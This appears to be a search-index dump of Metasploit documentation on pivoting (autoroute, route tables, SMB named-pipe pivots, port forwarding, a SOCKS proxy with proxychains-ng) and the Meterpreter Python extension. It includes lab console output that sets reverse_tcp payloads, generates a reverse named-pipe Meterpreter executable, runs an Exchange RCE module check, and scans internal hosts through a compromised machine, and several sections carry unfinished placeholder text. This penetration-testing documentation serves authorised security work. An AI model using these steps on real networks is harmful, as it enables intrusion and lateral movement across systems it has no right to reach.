    "content": "One of the easiest ways to do this is to use the post/multi/manage/autoroute module which will help us automatically add in routes for the target to Metasploit’s routing table so that Metasploit knows how to route traffic through the session that we have on the Windows 11 box and to the target Windows Server 2019 box. Lets look at a sample run of this command: . meterpreter &amp;gt; background [*] Backgrounding session 1... msf6 exploit(multi/handler) &amp;gt; use post/multi/manage/autoroute msf6 post(multi/manage/autoroute) &amp;gt; show options Module options (post/multi/manage/autoroute): Name Current Setting Required Description ---- --------------- -------- ----------- CMD autoadd yes Specify the autoroute command (Accepted: add, auto add, print, delete, default) NETMASK 255.255.255.0 no Netmask (IPv4 as \"255.255.255.0\" or CIDR as \"/24\" SESSION yes The session to run this module on SUBNET no Subnet (IPv4, for example, 10.10.10.0) msf6 post(multi/manage/autoroute) &amp;gt; set SESSION 1 SESSION =&amp;gt; 1 msf6 post(multi/manage/autoroute) &amp;gt; set SUBNET 169.254.0.0 SUBNET =&amp;gt; 169.254.0.0 msf6 post(multi/manage/autoroute) &amp;gt; set NETMASK /16 NETMASK =&amp;gt; /16 msf6 post(multi/manage/autoroute) &amp;gt; show options Module options (post/multi/manage/autoroute): Name Current Setting Required Description ---- --------------- -------- ----------- CMD autoadd yes Specify the autoroute command (Accepted: add, auto add, print, delete, default) NETMASK /16 no Netmask (IPv4 as \"255.255.255.0\" or CIDR as \"/24\" SESSION 1 yes The session to run this module on SUBNET 169.254.0.0 no Subnet (IPv4, for example, 10.10.10.0) msf6 post(multi/manage/autoroute) &amp;gt; run [!] SESSION may not be compatible with this module: [!] * incompatible session platform: windows [*] Running module against WIN11-TEST [*] Searching for subnets to autoroute. [+] Route added to subnet 169.254.0.0/255.255.0.0 from host's routing table. [+] Route added to subnet 172.19.176.0/255.255.240.0 from host's routing table. [*] Post module execution completed msf6 post(multi/manage/autoroute) &amp;gt; . If we now use Meterpreter’s route command we can see that we have two route table entries within Metasploit’s routing table, that are tied to Session 1, aka the session on the Windows 11 machine. This means anytime we want to contact a machine within one of the networks specified, we will go through Session 1 and use that to connect to the targets. msf6 post(multi/manage/autoroute) &amp;gt; route IPv4 Active Routing Table ========================= Subnet Netmask Gateway ------ ------- ------- 169.254.0.0 255.255.0.0 Session 1 172.19.176.0 255.255.240.0 Session 1 [*] There are currently no IPv6 routes defined. msf6 post(multi/manage/autoroute) &amp;gt; . All right so that’s one way, but what if we wanted to do this manually? First off to flush all routes from the routing table, we will do route flush followed by route to double check we have successfully removed the entries. msf6 post(multi/manage/autoroute) &amp;gt; route flush msf6 post(multi/manage/autoroute) &amp;gt; route [*] There are currently no routes defined. msf6 post(multi/manage/autoroute) &amp;gt; . Now lets trying doing the same thing manually. ",
    "url": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#autoroute",
    "relUrl": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#autoroute"
  },"728": {
    "doc": "Pivoting in Metasploit",
    "title": "Route",
    "content": "Here we can use route add &amp;lt;IP ADDRESS OF SUBNET&amp;gt; &amp;lt;NETMASK&amp;gt; &amp;lt;GATEWAY&amp;gt; to add the routes from within Metasploit, followed by route print to then print all the routes that Metasploit knows about. Note that the Gateway parameter is either an IP address to use as the gateway or as is more commonly the case, the session ID of an existing session to use to pivot the traffic through. msf6 post(multi/manage/autoroute) &amp;gt; route add 169.254.0.0 255.255.0.0 1 [*] Route added msf6 post(multi/manage/autoroute) &amp;gt; route add 172.19.176.0 255.255.240 1 [-] Invalid gateway msf6 post(multi/manage/autoroute) &amp;gt; route add 172.19.176.0 255.255.240.0 1 [*] Route added msf6 post(multi/manage/autoroute) &amp;gt; route print IPv4 Active Routing Table ========================= Subnet Netmask Gateway ------ ------- ------- 169.254.0.0 255.255.0.0 Session 1 172.19.176.0 255.255.240.0 Session 1 [*] There are currently no IPv6 routes defined. msf6 post(multi/manage/autoroute) &amp;gt; . Finally we can check that the route will use session 1 by using route get 169.254.204.110 . msf6 post(multi/manage/autoroute) &amp;gt; route get 169.254.204.110 169.254.204.110 routes through: Session 1 msf6 post(multi/manage/autoroute) &amp;gt; . If we want to then remove a specific route (such as in this case we want to remove the 172.19.176.0/20 route since we don’t need that for this test), we can issue the route del or route remove commands with the syntax route remove &amp;lt;IP ADDRESS OF SUBNET&amp;gt;&amp;lt;NETMASK IN SLASH FORMAT&amp;gt; &amp;lt;GATEWAY&amp;gt; . Example: . msf6 post(multi/manage/autoroute) &amp;gt; route remove 172.19.176.0/20 1 [*] Route removed msf6 post(multi/manage/autoroute) &amp;gt; route IPv4 Active Routing Table ========================= Subnet Netmask Gateway ------ ------- ------- 169.254.0.0 255.255.0.0 Session 1 [*] There are currently no IPv6 routes defined. msf6 post(multi/manage/autoroute) &amp;gt; . ",
    "url": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#route",
    "relUrl": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#route"
  },"729": {
    "doc": "Pivoting in Metasploit",
    "title": "Using the Pivot",
    "content": "At this point we can now use the pivot with any Metasploit modules as shown below: . msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) &amp;gt; show options Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce): Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword thePassword yes The password to use to authenticate to the Ex change server HttpUsername administrator yes The username to log into the Exchange server as Proxies no A proxy chain of format type:host:port[,type: host:port][...] RHOSTS 169.254.204.110 yes The target host(s), see https://github.com/ra pid7/metasploit-framework/wiki/Using-Metasplo it RPORT 443 yes The target port (TCP) SRVHOST 0.0.0.0 yTo come, awaiting some more testing hold on :)es The local host or network interface to listen on. This must be an address on the local mac hine or 0.0.0.0 to listen on all addresses. SRVPORT 8080 yes The local port to listen on. SSL true no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) TARGETURI / yes Base path URIPATH no The URI to use for this exploit (default is r andom) VHOST no HTTP server virtual host Payload options (cmd/windows/powershell_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 172.19.182.171 yes The listen address (an interface may be speci fied) LOAD_MODULES no A list of powershell modules separated by a c omma to download over the web LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows Command msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) &amp;gt; check [*] Target is an Exchange Server! [*] 169.254.204.110:443 - The target is not exploitable. Exchange Server 15.2.986.14 does not appear to be a vulnerable version! msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) &amp;gt; . ",
    "url": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#using-the-pivot",
    "relUrl": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#using-the-pivot"
  },"730": {
    "doc": "Pivoting in Metasploit",
    "title": "SMB Named Pipe Pivoting in Meterpreter",
    "content": "The Windows Meterpreter payload supports lateral movement in a network through SMB Named Pipe Pivoting. No other Meterpreters/session types support this functionality. First open a Windows Meterpreter session to the pivot machine: . msf6 &amp;gt; use payload/windows/x64/meterpreter/reverse_tcp smsf6 payload(windows/x64/meterpreter/reverse_tcp) &amp;gt; set lhost 172.19.182.171 lhost =&amp;gt; 172.19.182.171 msf6 payload(windows/x64/meterpreter/reverse_tcp) &amp;gt; set lport 4578 lport =&amp;gt; 4578 msf6 payload(windows/x64/meterpreter/reverse_tcp) &amp;gt; to_handler [*] Payload Handler Started as Job 0 [*] Started reverse TCP handler on 172.19.182.171:4578 msf6 payload(windows/x64/meterpreter/reverse_tcp) &amp;gt; [*] Sending stage (200774 bytes) to 172.19.185.34 [*] Meterpreter session 1 opened (172.19.182.171:4578 -&amp;gt; 172.19.185.34:49674) at 2022-06-09 13:23:03 -0500 . Create named pipe pivot listener on the pivot machine, setting -l to the pivot’s bind address: . msf6 payload(windows/x64/meterpreter/reverse_tcp) &amp;gt; sessions -i -1 [*] Starting interaction with 1... meterpreter &amp;gt; pivot add -t pipe -l 169.254.16.221 -n msf-pipe -a x64 -p windows [+] Successfully created pipe pivot. meterpreter &amp;gt; background [*] Backgrounding session 1... Now generate a separate payload that will connect back through the pivot machine. This payload will be executed on the final target machine. Note there is no need to start a handler for the named pipe payload. msf6 payload(windows/x64/meterpreter/reverse_named_pipe) &amp;gt; show options Module options (payload/windows/x64/meterpreter/reverse_named_pipe): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) PIPEHOST . yes Host of the pipe to connect to PIPENAME msf-pipe yes Name of the pipe to listen on msf6 payload(windows/x64/meterpreter/reverse_named_pipe) &amp;gt; set pipehost 169.254.16.221 pipehost =&amp;gt; 169.254.16.221 msf6 payload(windows/x64/meterpreter/reverse_named_pipe) &amp;gt; generate -f exe -o revpipe_meterpreter_msfpipe.exe [*] Writing 7168 bytes to revpipe_meterpreter_msfpipe.exe... After running the payload on the final target machine a new session will open, via the Windows 11 169.254.16.221 pivot. msf6 payload(windows/x64/meterpreter/reverse_named_pipe) &amp;gt; [*] Meterpreter session 2 opened (Pivot via [172.19.182.171:4578 -&amp;gt; 169.254.16.221:49674]) at 2022-06-09 13:34:32 -0500 msf6 payload(windows/x64/meterpreter/reverse_named_pipe) &amp;gt; sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x64/windows WIN11\\msfuser @ WIN11 172.19.182.171:4578 -&amp;gt; 172.19.185.34:49674 (172.19.185.34) 2 meterpreter x64/windows WIN2019\\msfuser @ WIN2019 Pivot via [172.19.182.171:4578 -&amp;gt; 172.19.185.34:49674] (169.254.204.110) . ",
    "url": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#smb-named-pipe-pivoting-in-meterpreter",
    "relUrl": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#smb-named-pipe-pivoting-in-meterpreter"
  },"731": {
    "doc": "Pivoting in Metasploit",
    "title": "Pivoting External Tools",
    "content": "portfwd . Note: This method is discouraged as you can only set up a mapping between a single port and another target host and port, so using the socks module below is encouraged where possible. Additionally this method has been depreciated for some time now. Local Port Forwarding . To set up a port forward using Metasploit, use the portfwd command within a supported session’s console such as the Meterpreter console. Using portfwd -h will bring up a help menu similar to the following: . meterpreter &amp;gt; portfwd -h Usage: portfwd [-h] [add | delete | list | flush] [args] OPTIONS: -h Help banner. -i Index of the port forward entry to interact with (see the \"list\" command). -l Forward: local port to listen on. Reverse: local port to connect to. -L Forward: local host to listen on (optional). Reverse: local host to connect to. -p Forward: remote port to connect to. Reverse: remote port to listen on. -r Forward: remote host to connect to. -R Indicates a reverse port forward. meterpreter &amp;gt; . To add a port forward, use portfwd add and specify the -l, -p and -r options at a minimum to specify the local port to listen on, the report port to connect to, and the target host to connect to respectively. meterpreter &amp;gt; portfwd add -l 1090 -p 443 -r 169.254.37.128 [*] Local TCP relay created: :1090 &amp;lt;-&amp;gt; 169.254.37.128:443 meterpreter &amp;gt; . Note that something that is commonly misunderstood here is that the port will be opened on the machine running Metasploit itself, NOT on the target that the session is running on. We can then connect to the target host using the local port on the machine running Metasploit: . ~/git/metasploit-framework │ master ?21 wget --no-check-certificate https://127.0.0.1:1090 --2022-04-08 14:36:23-- https://127.0.0.1:1090/ Connecting to 127.0.0.1:1090... connected. WARNING: cannot verify 127.0.0.1's certificate, issued by ‘CN=DC1’: Self-signed certificate encountered. WARNING: certificate common name ‘DC1’ doesn't match requested host name ‘127.0.0.1’. HTTP request sent, awaiting response... 302 Moved Temporarily Location: https://127.0.0.1/owa/ [following] --2022-04-08 14:36:23-- https://127.0.0.1/owa/ Connecting to 127.0.0.1:443... failed: Connection refused. ~/git/metasploit-framework │ master ?21 . Note that you may need to edit your /etc/hosts file to map IP addresses to given host names to allow things like redirects to redirect to the right hostname or IP address when using this method of pivoting. Listing Port Forwards and Removing Entries . Can list port forwards using the portfwd list command. To delete all port forwards use portfwd flush. Alternatively to selectively delete local port forwarding entries, use portfwd delete -l &amp;lt;local port&amp;gt;. meterpreter &amp;gt; portfwd delete -l 1090 [*] Successfully stopped TCP relay on 0.0.0.0:1090 meterpreter &amp;gt; portfwd list No port forwards are currently active. meterpreter &amp;gt; . Remote Port Forwarding . This scenario is a bit different than above. Whereas previously we were instructing the session to forward traffic from our host running Metasploit, through the session, and to a second target host, with reverse port forwarding the scenario is a bit different. In this case we are instructing the session to forward traffic from other hosts through the session, and to our host running Metasploit. This is useful for allowing other applications running within a target network to interact with local applications on the machine running Metasploit. To set up a reverse port forward, use portfwd add -R within a supported session and then specify the -l, -L and -p options. The -l option specifies the port to forward the traffic to, the -L option specifies the IP address to forward the traffic to, and the -p option specifies the port to listen on for traffic on the machine that we have a session on (whose session console we are currently interacting with). For example to listen on port 9093 on a target session and have it forward all traffic to the Metasploit machine at 172.20.97.72 on port 9093 we could execute portfwd add -R -l 4444 -L 172.20.97.73 -p 9093 as shown below, which would then cause the machine who have a session on to start listening on port 9093 for incoming connections. meterpreter &amp;gt; portfwd add -R -l 4444 -L 172.20.97.73 -p 9093 [*] Local TCP relay created: 172.20.97.73:4444 &amp;lt;-&amp;gt; :9093 meterpreter &amp;gt; netstat -a Connection list =============== Proto Local addre Remote addr State User Inode PID/Program name ss ess ----- ----------- ----------- ----- ---- ----- ---------------- tcp 0.0.0.0:135 0.0.0.0:* LISTEN 0 0 488/svchost.exe tcp 0.0.0.0:445 0.0.0.0:* LISTEN 0 0 4/System tcp 0.0.0.0:504 0.0.0.0:* LISTEN 0 0 5780/svchost.exe 0 tcp 0.0.0.0:909 0.0.0.0:* LISTEN 0 0 2116/bind_tcp_x64_4444.exe 3 . We can confirm this works by setting up a listener . XXX - to work on and confirm…. ",
    "url": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#pivoting-external-tools",
    "relUrl": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#pivoting-external-tools"
  },"732": {
    "doc": "Pivoting in Metasploit",
    "title": "Socks Module",
    "content": "Once routes are established, Metasploit modules can access the IP range specified in the routes. For other applications to access the routes, a little bit more setup is necessary. One way to solve this involves using the auxiliary/server/socks_proxy Metasploit module to set up a socks4a proxy, and then using proxychains-ng to direct external applications towards the established socks4a proxy server that Metasploit has set up so that external applications can use Metasploit’s internal routing table. Socks Server Module Setup . Metasploit can launch a SOCKS proxy server using the module: auxiliary/server/socks_proxy. When set up to bind to a local loopback adapter, applications can be directed to use the proxy to route TCP/IP traffic through Metasploit’s routing tables. Here is an example of how this module might be used: . msf6 &amp;gt; use auxiliary/server/socks_proxy msf6 auxiliary(server/socks_proxy) &amp;gt; show options Module options (auxiliary/server/socks_proxy): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no Proxy password for SOCKS5 listener SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. SRVPORT 1080 yes The port to listen on USERNAME no Proxy username for SOCKS5 listener VERSION 5 yes The SOCKS version to use (Accepted: 4a, 5) Auxiliary action: Name Description ---- ----------- Proxy Run a SOCKS proxy server msf6 auxiliary(server/socks_proxy) &amp;gt; set SRVHOST 127.0.0.1 SRVHOST =&amp;gt; 127.0.0.1 msf6 auxiliary(server/socks_proxy) &amp;gt; set SRVPORT 1080 SRVPORT =&amp;gt; 1080 msf6 auxiliary(server/socks_proxy) &amp;gt; run [*] Auxiliary module running as background job 0. msf6 auxiliary(server/socks_proxy) &amp;gt; [*] Starting the SOCKS proxy server msf6 auxiliary(server/socks_proxy) &amp;gt; jobs Jobs ==== Id Name Payload Payload opts -- ---- ------- ------------ 0 Auxiliary: server/socks_proxy msf6 auxiliary(server/socks_proxy) &amp;gt; . proxychains-ng Setup . First, make sure that you have installed proxychains-ng. You can also use proxychains however most repositories such as Ubuntu will have an outdated version of it and it has crashed before in my tests, so it is highly recommended to use proxychains-ng instead which is actively maintained. You can install it with the following commands: . git clone https://github.com/rofl0r/proxychains-ng cd proxychains-ng make sudo make install . Now edit the proxychains configuration file located at /etc/proxychains.conf. Add the below line to the end of the file to set proxychains-ng to use the SOCKS 5 server that you just set up. Note that you may need to use sudo to edit this file due to the default permissions on this file preventing anyone but root from writing to it. socks5 127.0.0.1 1080 . The final final should look something like this: . # proxychains.conf VER 3.1 # # HTTP, SOCKS4, SOCKS5 tunneling proxifier with DNS. # # The option below identifies how the ProxyList is treated. # only one option should be uncommented at time, # otherwise the last appearing option will be accepted # #dynamic_chain # # Dynamic - Each connection will be done via chained proxies # all proxies chained in the order as they appear in the list # at least one proxy must be online to play in chain # (dead proxies are skipped) # otherwise EINTR is returned to the app # strict_chain # # Strict - Each connection will be done via chained proxies # all proxies chained in the order as they appear in the list # all proxies must be online to play in chain # otherwise EINTR is returned to the app # #random_chain # # Random - Each connection will be done via random proxy # (or proxy chain, see chain_len) from the list. # this option is good to test your IDS :) # Make sense only if random_chain #chain_len = 2 # Quiet mode (no output from library) #quiet_mode # Proxy DNS requests - no leak for DNS data proxy_dns # Some timeouts in milliseconds tcp_read_time_out 15000 tcp_connect_time_out 8000 # ProxyList format # type host port [user pass] # (values separated by 'tab' or 'blank') # # # Examples: # # socks5 192.168.67.78 1080 lamer secret # http 192.168.89.3 8080 justu hidden # socks4 192.168.1.49 1080 # http 192.168.39.93 8080 # # # proxy types: http, socks4, socks5 # ( auth types supported: \"basic\"-http \"user/pass\"-socks ) # [ProxyList] # add proxy here ... # meanwile # defaults set to \"tor\" socks5 127.0.0.1 1080 . Note: If there are other proxy entries in the configuration file, you may need to comment them out as they may interfere with proper routing. Using Proxychains-NG . Now you can combine proxychains-ng with other application like Nmap, Nessus, Firefox and more to scan or access machines and resources through the Metasploit routes. All you need to do is call proxychains-ng before the needed application. No need to change the proxy settings in the respective application. ~/git/metasploit-framework │ master ?21 wget https://169.254.37.128 --2022-04-08 13:52:23-- https://169.254.37.128/ Connecting to 169.254.37.128:443... failed: No route to host. ~/git/proxychains-ng │ master ?1 proxychains4 wget https://169.254.37.128 [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/local/lib/libproxychains4.so [proxychains] DLL init: proxychains-ng 4.16-git-1-g07c15a0 --2022-04-08 14:06:52-- https://169.254.37.128/ Connecting to 169.254.37.128:443... [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:443 ... OK connected. ERROR: cannot verify 169.254.37.128's certificate, issued by ‘CN=DC1’: Self-signed certificate encountered. ERROR: certificate common name ‘DC1’ doesn't match requested host name ‘169.254.37.128’. To connect to 169.254.37.128 insecurely, use `--no-check-certificate'. ~/git/proxychains-ng │ master ?1 proxychains4 wget --no-check-certificate https://169.254.37.128 [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/local/lib/libproxychains4.so [proxychains] DLL init: proxychains-ng 4.16-git-1-g07c15a0 --2022-04-08 14:26:53-- https://169.254.37.128/ Connecting to 169.254.37.128:443... [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:443 ... OK connected. WARNING: cannot verify 169.254.37.128's certificate, issued by ‘CN=DC1’: Self-signed certificate encountered. WARNING: certificate common name ‘DC1’ doesn't match requested host name ‘169.254.37.128’. HTTP request sent, awaiting response... 302 Moved Temporarily Location: https://169.254.37.128/owa/ [following] --2022-04-08 14:26:53-- https://169.254.37.128/owa/ Connecting to 169.254.37.128:443... [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:443 ... OK connected. WARNING: cannot verify 169.254.37.128's certificate, issued by ‘CN=DC1’: Self-signed certificate encountered. WARNING: certificate common name ‘DC1’ doesn't match requested host name ‘169.254.37.128’. HTTP request sent, awaiting response... 302 Found Location: https://169.254.37.128/owa/auth/logon.aspx?url=https%3a%2f%2f169.254.37.128%2fowa%2f&amp;amp;reason=0 [following] --2022-04-08 14:26:54-- https://169.254.37.128/owa/auth/logon.aspx?url=https%3a%2f%2f169.254.37.128%2fowa%2f&amp;amp;reason=0 Reusing existing connection to 169.254.37.128:443. HTTP request sent, awaiting response... 200 OK Length: 58714 (57K) [text/html] Saving to: ‘index.html’ index.html 100%[===========================&amp;gt;] 57.34K --.-KB/s in 0.1s 2022-04-08 14:26:54 (573 KB/s) - ‘index.html’ saved [58714/58714] ~/git/proxychains-ng │ master ?2 . Scanning . For scanning with Nmap, Zenmap, Nessus and others, keep in mind that ICMP and UPD traffic cannot tunnel through the proxy. So you cannot perform ping or UDP scans. For Nmap and Zenmap, the below example shows the commands can be used. It is best to be selective on ports to scan since scanning through the proxy tunnel can be slow. $ sudo proxychains4 nmap -n -sT -sV -PN -p 445 10.10.125.0/24 . Here is an example of how this might look when scanning a single host for port 445 over proxychains-ng: . ~/git/proxychains-ng │ master ?1 proxychains4 nmap -n -sT -A -PN -p 445 169.254.37.128 [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/local/lib/libproxychains4.so [proxychains] DLL init: proxychains-ng 4.16-git-1-g07c15a0 Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-08 14:08 CDT [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:7458 &amp;lt;--socket error or timeout! [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:42597 &amp;lt;--socket error or timeout! [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:1433 &amp;lt;--socket error or timeout! [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK Nmap scan report for 169.254.37.128 Host is up (0.14s latency). PORT STATE SERVICE VERSION 445/tcp open microsoft-ds? Host script results: |_clock-skew: -1s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2022-04-08T19:09:38 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 83.03 seconds . ",
    "url": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#socks-module",
    "relUrl": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#socks-module"
  },"733": {
    "doc": "Pivoting in Metasploit",
    "title": "Pivoting in Metasploit",
    "content": " ",
    "url": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html",
    "relUrl": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html"
  },"734": {
    "doc": "Powershell Extension",
    "title": "Powershell Extension",
    "content": "I’m yet to get the documentation done for this extension, but in the mean time there’s some useful information in the original payloads pull request that shows how it can be used (including bindings). I promise to get more detail here soon! . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/powershell-extension.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/powershell-extension.html"
  },"735": {
    "doc": "Python Extension",
    "title": "Introduction",
    "content": "For quite some time, Meterpreter users have wanted the ability to run arbitrary scripts under the context of a session on the target machine. While Railgun gives coders the ability to execute arbitrary Win32 API calls, it doesn’t really give them the ability to script the client in a single-shot. Meterpreter now has a new extension that aims to solve this problem by providing a completely in-memory Python interpreter that can load scripts, run ad-hoc python commands, and also provides bindings to Meterpreter itself. The extension comes with many (but not all) of the built-in functionality you would expect to see in a running Python interpreter. This includes the likes of ctypes for easy automation of Win32-related functions. We’ve even taken steps to make this extension piggy-back onto metsrv’s copy of the SSL libraries in an effort to reduce the size of the resulting binary. This page aims to document the features, show examples of how it can be used, and answer a few common questions that come up. Unfortunately, at this point in time the extension only works inside x86 and x64 Meterpreters running on Windows targets. However, there are plans to enable this functionality on other implementations over time. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#introduction",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#introduction"
  },"736": {
    "doc": "Python Extension",
    "title": "Usage",
    "content": "As with any other extension that comes with Meterpreter, loading it is very simple: . meterpreter &amp;gt; use python Loading extension python...success. Once loaded, the help system shows the commands that come with the extension: . meterpreter &amp;gt; help ... snip ... Python Commands =============== Command Description ------- ----------- python_execute Execute a python command string python_import Import/run a python file or module python_reset Resets/restarts the Python interpreter . Each of these commands is discussed in detail below. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#usage",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#usage"
  },"737": {
    "doc": "Python Extension",
    "title": "python_execute",
    "content": "The python_execute command is the simplest of all commands that come with the extension, and provides the means to run single-shot lines of Python code, much in the same way that the normal Python interpreter functions from the command-line when using the -c switch. The full help for the command is as follows: . meterpreter &amp;gt; python_execute -h Usage: python_execute &amp;lt;python code&amp;gt; [-r result var name] Runs the given python string on the target. If a result is required, it should be stored in a python variable, and that variable should passed using the -r parameter. OPTIONS: -h Help banner -r &amp;lt;opt&amp;gt; Name of the variable containing the result (optional) . A very simple example of this command is shown below: . meterpreter &amp;gt; python_execute \"print 'Hi, from Meterpreter!'\" [+] Content written to stdout: Hi, from Meterpreter! . Notice that any output that is written to stdout is captured by Meterpreter and returned to Metasploit so that it’s visible to the user. This also happens for anything written to stderr, as shown below: . meterpreter &amp;gt; python_execute \"x = x + 1\" [-] Content written to stderr: Traceback (most recent call last): File \"&amp;lt;string&amp;gt;\", line 1, in &amp;lt;module&amp;gt; NameError: name 'x' is not defined . This handy feature now only allows users to see the output of their scripts, but it also means that any errors are completely visible too. A more interesting example can be seen below: . meterpreter &amp;gt; python_execute \"x = [y for y in range(0, 20) if y % 5 == 0]\" [+] Command executed without returning a result . The command above executes, but nothing was printed to stdout, or to stderr, and hence nothing was captured. The good thing is that the Python extension is persistent across calls. This means that after the above command is executed, x is still present in the interpreter and can be accessed with another call: . meterpreter &amp;gt; python_execute \"print x\" [+] Content written to stdout: [0, 5, 10, 15] . As useful as this is, developers may want to produce post-modules that make use of the data that a Python script has generated. Parsing stdout is not ideal in such a scenario, and hence this command provides the means for individual variables to be extracted directly using the -r parameter, as described by the help: . meterpreter &amp;gt; python_execute \"x = [y for y in range(0, 20) if y % 5 == 0]\" -r x [+] x = [0, 5, 10, 15] . Note that this command requires the first parameter to be a string that contains code that needs to be executed. However, this string can be blank, resulting in no code being executed. This means that extraction of content generated in previous calls is still possible without executing more code, or rerunning previous code snippets just to make use of the -r parameter: . meterpreter &amp;gt; python_execute \"\" -r x [+] x = [0, 5, 10, 15] . Behind the scenes, the result of the execution is a Ruby hash that contains all content written to stdout and stderr, and the content of the variable chosen using the -r parameter. Sometimes, single-line execution isn’t enough, or is cumbersome. The python_import command is provided to solve this problem and allow for scripts and modules to be loaded into the target from disk. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#python_execute",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#python_execute"
  },"738": {
    "doc": "Python Extension",
    "title": "python_import",
